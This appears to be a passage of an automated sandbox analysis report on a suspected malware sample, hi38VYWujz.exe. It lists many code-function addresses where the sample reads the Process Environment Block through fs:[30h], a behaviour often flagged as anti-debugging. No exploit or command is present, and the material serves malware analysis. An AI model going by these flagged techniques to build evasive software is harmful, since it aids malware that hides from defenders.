Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE24A2 mov ecx, dword ptr fs:[00000030h]	11_2_36AE24A2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B784BB mov eax, dword ptr fs:[00000030h]	11_2_36B784BB
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E4BC mov eax, dword ptr fs:[00000030h]	11_2_36B1E4BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6D4A0 mov ecx, dword ptr fs:[00000030h]	11_2_36B6D4A0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6D4A0 mov eax, dword ptr fs:[00000030h]	11_2_36B6D4A0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6D4A0 mov eax, dword ptr fs:[00000030h]	11_2_36B6D4A0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B144A8 mov eax, dword ptr fs:[00000030h]	11_2_36B144A8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1B490 mov eax, dword ptr fs:[00000030h]	11_2_36B1B490
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1B490 mov eax, dword ptr fs:[00000030h]	11_2_36B1B490
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C490 mov eax, dword ptr fs:[00000030h]	11_2_36B6C490
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE0485 mov ecx, dword ptr fs:[00000030h]	11_2_36AE0485
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1648A mov eax, dword ptr fs:[00000030h]	11_2_36B1648A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1648A mov eax, dword ptr fs:[00000030h]	11_2_36B1648A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1648A mov eax, dword ptr fs:[00000030h]	11_2_36B1648A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A4F0 mov eax, dword ptr fs:[00000030h]	11_2_36B1A4F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A4F0 mov eax, dword ptr fs:[00000030h]	11_2_36B1A4F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F4FD mov eax, dword ptr fs:[00000030h]	11_2_36B9F4FD
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B094FA mov eax, dword ptr fs:[00000030h]	11_2_36B094FA
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B154E0 mov eax, dword ptr fs:[00000030h]	11_2_36B154E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E4EF mov eax, dword ptr fs:[00000030h]	11_2_36B1E4EF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E4EF mov eax, dword ptr fs:[00000030h]	11_2_36B1E4EF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE64F0 mov eax, dword ptr fs:[00000030h]	11_2_36AE64F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F4D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B044D1 mov eax, dword ptr fs:[00000030h]	11_2_36B044D1
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B044D1 mov eax, dword ptr fs:[00000030h]	11_2_36B044D1
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B014C9 mov eax, dword ptr fs:[00000030h]	11_2_36B014C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B014C9 mov eax, dword ptr fs:[00000030h]	11_2_36B014C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B014C9 mov eax, dword ptr fs:[00000030h]	11_2_36B014C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B014C9 mov eax, dword ptr fs:[00000030h]	11_2_36B014C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B014C9 mov eax, dword ptr fs:[00000030h]	11_2_36B014C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB420 mov eax, dword ptr fs:[00000030h]	11_2_36ADB420
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B17425 mov eax, dword ptr fs:[00000030h]	11_2_36B17425
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B17425 mov ecx, dword ptr fs:[00000030h]	11_2_36B17425
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6F42F mov eax, dword ptr fs:[00000030h]	11_2_36B6F42F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6F42F mov eax, dword ptr fs:[00000030h]	11_2_36B6F42F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6F42F mov eax, dword ptr fs:[00000030h]	11_2_36B6F42F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6F42F mov eax, dword ptr fs:[00000030h]	11_2_36B6F42F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6F42F mov eax, dword ptr fs:[00000030h]	11_2_36B6F42F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B69429 mov eax, dword ptr fs:[00000030h]	11_2_36B69429
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD640D mov eax, dword ptr fs:[00000030h]	11_2_36AD640D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F409 mov eax, dword ptr fs:[00000030h]	11_2_36B9F409
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B76400 mov eax, dword ptr fs:[00000030h]	11_2_36B76400
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B76400 mov eax, dword ptr fs:[00000030h]	11_2_36B76400
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F478 mov eax, dword ptr fs:[00000030h]	11_2_36B9F478
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE8470 mov eax, dword ptr fs:[00000030h]	11_2_36AE8470
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE8470 mov eax, dword ptr fs:[00000030h]	11_2_36AE8470
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAA464 mov eax, dword ptr fs:[00000030h]	11_2_36BAA464
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1D450 mov eax, dword ptr fs:[00000030h]	11_2_36B1D450
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1D450 mov eax, dword ptr fs:[00000030h]	11_2_36B1D450
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445 mov eax, dword ptr fs:[00000030h]	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E45E mov eax, dword ptr fs:[00000030h]	11_2_36B0E45E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E45E mov eax, dword ptr fs:[00000030h]	11_2_36B0E45E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E45E mov eax, dword ptr fs:[00000030h]	11_2_36B0E45E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E45E mov eax, dword ptr fs:[00000030h]	11_2_36B0E45E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E45E mov eax, dword ptr fs:[00000030h]	11_2_36B0E45E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60443 mov eax, dword ptr fs:[00000030h]	11_2_36B60443
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AED454 mov eax, dword ptr fs:[00000030h]	11_2_36AED454
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B685AA mov eax, dword ptr fs:[00000030h]	11_2_36B685AA
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE45B0 mov eax, dword ptr fs:[00000030h]	11_2_36AE45B0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE45B0 mov eax, dword ptr fs:[00000030h]	11_2_36AE45B0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C592 mov eax, dword ptr fs:[00000030h]	11_2_36B6C592
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B12594 mov eax, dword ptr fs:[00000030h]	11_2_36B12594
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B87591 mov edi, dword ptr fs:[00000030h]	11_2_36B87591
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A580 mov eax, dword ptr fs:[00000030h]	11_2_36B1A580
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A580 mov eax, dword ptr fs:[00000030h]	11_2_36B1A580
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B19580 mov eax, dword ptr fs:[00000030h]	11_2_36B19580
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B19580 mov eax, dword ptr fs:[00000030h]	11_2_36B19580
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F582 mov eax, dword ptr fs:[00000030h]	11_2_36B9F582
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E588 mov eax, dword ptr fs:[00000030h]	11_2_36B5E588
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E588 mov eax, dword ptr fs:[00000030h]	11_2_36B5E588
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C5FC mov eax, dword ptr fs:[00000030h]	11_2_36B6C5FC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEB5E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A5E7 mov ebx, dword ptr fs:[00000030h]	11_2_36B1A5E7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A5E7 mov eax, dword ptr fs:[00000030h]	11_2_36B1A5E7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B655E0 mov eax, dword ptr fs:[00000030h]	11_2_36B655E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B115EF mov eax, dword ptr fs:[00000030h]	11_2_36B115EF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B165D0 mov eax, dword ptr fs:[00000030h]	11_2_36B165D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6B5D3 mov eax, dword ptr fs:[00000030h]	11_2_36B6B5D3
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADF5C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B605C6 mov eax, dword ptr fs:[00000030h]	11_2_36B605C6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C5C6 mov eax, dword ptr fs:[00000030h]	11_2_36B1C5C6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF252B mov eax, dword ptr fs:[00000030h]	11_2_36AF252B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22539 mov eax, dword ptr fs:[00000030h]	11_2_36B22539
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD753F mov eax, dword ptr fs:[00000030h]	11_2_36AD753F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD753F mov eax, dword ptr fs:[00000030h]	11_2_36AD753F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD753F mov eax, dword ptr fs:[00000030h]	11_2_36AD753F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1F523 mov eax, dword ptr fs:[00000030h]	11_2_36B1F523
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B11527 mov eax, dword ptr fs:[00000030h]	11_2_36B11527
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE3536 mov eax, dword ptr fs:[00000030h]	11_2_36AE3536
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE3536 mov eax, dword ptr fs:[00000030h]	11_2_36AE3536
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B01514 mov eax, dword ptr fs:[00000030h]	11_2_36B01514
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C51D mov eax, dword ptr fs:[00000030h]	11_2_36B6C51D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE2500 mov eax, dword ptr fs:[00000030h]	11_2_36AE2500
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB502 mov eax, dword ptr fs:[00000030h]	11_2_36ADB502
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0E507 mov eax, dword ptr fs:[00000030h]	11_2_36B0E507
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C50D mov eax, dword ptr fs:[00000030h]	11_2_36B1C50D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1C50D mov eax, dword ptr fs:[00000030h]	11_2_36B1C50D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFC560 mov eax, dword ptr fs:[00000030h]	11_2_36AFC560
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B69567 mov eax, dword ptr fs:[00000030h]	11_2_36B69567
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE254C mov eax, dword ptr fs:[00000030h]	11_2_36AE254C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB55F mov eax, dword ptr fs:[00000030h]	11_2_36BBB55F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB55F mov eax, dword ptr fs:[00000030h]	11_2_36BBB55F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFE547 mov eax, dword ptr fs:[00000030h]	11_2_36AFE547
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAA553 mov eax, dword ptr fs:[00000030h]	11_2_36BAA553
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B16540 mov eax, dword ptr fs:[00000030h]	11_2_36B16540
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B18540 mov eax, dword ptr fs:[00000030h]	11_2_36B18540
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD92AF mov eax, dword ptr fs:[00000030h]	11_2_36AD92AF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB2BC mov eax, dword ptr fs:[00000030h]	11_2_36BBB2BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB2BC mov eax, dword ptr fs:[00000030h]	11_2_36BBB2BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB2BC mov eax, dword ptr fs:[00000030h]	11_2_36BBB2BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BBB2BC mov eax, dword ptr fs:[00000030h]	11_2_36BBB2BC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F2AE mov eax, dword ptr fs:[00000030h]	11_2_36B9F2AE
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADC2B0 mov ecx, dword ptr fs:[00000030h]	11_2_36ADC2B0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B042AF mov eax, dword ptr fs:[00000030h]	11_2_36B042AF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B042AF mov eax, dword ptr fs:[00000030h]	11_2_36B042AF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E289 mov eax, dword ptr fs:[00000030h]	11_2_36B5E289
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE7290 mov eax, dword ptr fs:[00000030h]	11_2_36AE7290
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE7290 mov eax, dword ptr fs:[00000030h]	11_2_36AE7290
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE7290 mov eax, dword ptr fs:[00000030h]	11_2_36AE7290
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD2EC mov eax, dword ptr fs:[00000030h]	11_2_36ADD2EC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD2EC mov eax, dword ptr fs:[00000030h]	11_2_36ADD2EC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD72E0 mov eax, dword ptr fs:[00000030h]	11_2_36AD72E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEA2E0 mov eax, dword ptr fs:[00000030h]	11_2_36AEA2E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE82E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE82E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE82E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE82E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE82E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE82E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE82E0 mov eax, dword ptr fs:[00000030h]	11_2_36AE82E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF02F9 mov eax, dword ptr fs:[00000030h]	11_2_36AF02F9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B132C0 mov eax, dword ptr fs:[00000030h]	11_2_36B132C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B132C0 mov eax, dword ptr fs:[00000030h]	11_2_36B132C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB32C9 mov eax, dword ptr fs:[00000030h]	11_2_36BB32C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B032C5 mov eax, dword ptr fs:[00000030h]	11_2_36B032C5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B00230 mov ecx, dword ptr fs:[00000030h]	11_2_36B00230
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60227 mov eax, dword ptr fs:[00000030h]	11_2_36B60227
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60227 mov eax, dword ptr fs:[00000030h]	11_2_36B60227
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60227 mov eax, dword ptr fs:[00000030h]	11_2_36B60227
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A22B mov eax, dword ptr fs:[00000030h]	11_2_36B1A22B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A22B mov eax, dword ptr fs:[00000030h]	11_2_36B1A22B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A22B mov eax, dword ptr fs:[00000030h]	11_2_36B1A22B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6B214 mov eax, dword ptr fs:[00000030h]	11_2_36B6B214
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6B214 mov eax, dword ptr fs:[00000030h]	11_2_36B6B214
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADA200 mov eax, dword ptr fs:[00000030h]	11_2_36ADA200
